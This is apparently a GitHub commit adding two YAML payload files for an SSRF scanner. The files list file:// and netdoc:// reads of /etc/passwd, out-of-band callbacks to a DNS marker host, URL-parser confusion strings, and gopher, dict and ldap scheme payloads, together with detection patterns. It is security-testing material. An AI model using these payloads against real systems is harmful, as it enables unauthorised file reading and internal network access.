Skip to content

Commit b71609d

Browse files
MKirichenko-WallarmMKirichenko-Wallarm
authored
Merge pull request #81 from 0x566164696D/rechecker-ssrf
new payloads for rechecker
2 parents 39002f4 + d08e0aa commit b71609d

File tree

2 files changed

+53
-0
lines changed

2 files changed

+53
-0
lines changed

ssrf-rechecker-lfi.yaml

Lines changed: 21 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,21 @@
1+
generate:
2+
- payload:
3+
- 'netdoc:///etc/passwd'
4+
- 'file:///etc/passwd'
5+
- 'file://c:\windows\system32\drivers\etc\networks'
6+
- method:
7+
- replace
8+
detect:
9+
- response:
10+
- body: '# campus 284.122.107'
11+
- body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*'
12+
meta-info:
13+
- type: rce
14+
- threat: 70
15+
- title: "Server Side Request Forgery (SSRF)"
16+
- description: "The target application may have functionality for importing data from a URL, publishing data to a URL or otherwise reading data from a URL that can be tampered with. The attacker modifies the calls to this functionality by supplying a completely different URL or by manipulating how URLs are built (path traversal, etc)."
17+
- applicable_for: ["attack_rechecker"]
18+
- tags:
19+
- SSRF
20+
- Server Side Request Forgery
21+
- CWE-918

ssrf-rechecker-oob.yaml

Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
generate:
2+
- payload:
3+
- 'DNS_MARKER'
4+
- 'http://DNS_MARKER/'
5+
- 'http://DNS_MARKER &@2.2.2.2# @3.3.3.3/'
6+
- 'http://1.1.1.1 &@DNS_MARKER# @3.3.3.3/'
7+
- 'http://1.1.1.1 &@2.2.2.2# @DNS_MARKER/'
8+
- 'http://127.1.1.1:80\@DNS_MARKER:80/'
9+
- 'http://127.1.1.1:80\@@DNS_MARKER:80/'
10+
- 'http://127.1.1.1:80:\@@DNS_MARKER:80/'
11+
- 'http://127.1.1.1:80#\@DNS_MARKER:80/'
12+
- 'jar:http://DNS_MARKER!/'
13+
- 'dict://DNS_MARKER:11111/'
14+
- 'sftp://DNS_MARKER:8022/'
15+
- 'tftp://DNS_MARKER:69/somefile'
16+
- 'ldap://DNS_MARKER:389/%0astats%0aquit'
17+
- 'gopher://DNS_MARKER:70/'
18+
- method:
19+
- replace
20+
detect:
21+
- oob:
22+
- dns
23+
meta-info:
24+
- type: rce
25+
- threat: 70
26+
- title: "Server Side Request Forgery (SSRF)"
27+
- description: "The target application may have functionality for importing data from a URL, publishing data to a URL or otherwise reading data from a URL that can be tampered with. The attacker modifies the calls to this functionality by supplying a completely different URL or by manipulating how URLs are built (path traversal, etc)."
28+
- applicable_for: ["attack_rechecker"]
29+
- tags:
30+
- SSRF
31+
- Server Side Request Forgery
32+
- CWE-918

0 commit comments

Comments
 (0)